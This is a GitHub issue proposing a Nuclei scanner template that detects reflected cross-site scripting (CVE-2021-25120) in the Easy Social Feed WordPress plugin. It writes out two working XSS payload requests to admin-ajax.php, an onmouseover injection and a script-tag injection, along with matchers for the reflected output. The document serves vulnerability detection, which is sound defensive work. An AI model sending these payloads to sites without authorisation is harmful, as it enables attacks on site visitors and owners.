### ISSUE TITLE
CVE-2021-25120

### ISSUE THREAD

**Issue by Akincibor** [projectdiscovery/nuclei-templates#4205]
```yaml
id: CVE-2021-25120

info:
  name: Easy Social Feed < 6.2.7 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugins do not sanitise some of their parameters used via AJAX actions before outputting them back in the response, leading to Reflected Cross-Site Scripting issues.
  reference:
    - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6
  tags: xss,wp,wp-plugin,wordpress,cve,cve2021

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=efbl_load_feed_popup&pid=1&link_target=%22onmouseover=alert(document.domain)//'
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=efbl_generate_popup_html&rand_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ' onmouseover=alert(document.domain)'
          - '<script>alert(document.domain)</script>'
        condition: or

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
```
